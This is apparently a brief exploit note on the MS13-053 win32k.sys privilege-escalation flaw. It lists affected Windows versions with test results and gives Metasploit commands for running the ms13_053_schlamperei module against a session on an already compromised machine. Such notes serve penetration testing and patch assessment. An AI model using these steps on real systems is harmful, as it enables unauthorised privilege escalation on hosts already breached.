win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability."
Product | CPU Architecture | Version | Update | Tested |
---|---|---|---|---|
Windows 7 | SP1 | ✔ | ||
Windows 8 | ||||
Windows Rt | ||||
Windows Server 2003 | SP2 | |||
Windows Server 2008 | SP2 | ✔ | ||
Windows Server 2008 | R2 | SP1 | ✔ | |
Windows Server 2012 | ||||
Windows Vista | SP2 | |||
Windows Xp | SP2 | |||
Windows Xp | SP3 |
X86 Utilization
Test system Windows 7 SP1 x86 ,Use MSF directly, we have been online.
use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run
Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable
Windows Sever 2003 SP2 x86 GIF
Windows Sever 2003 R2 SP2 x86 GIF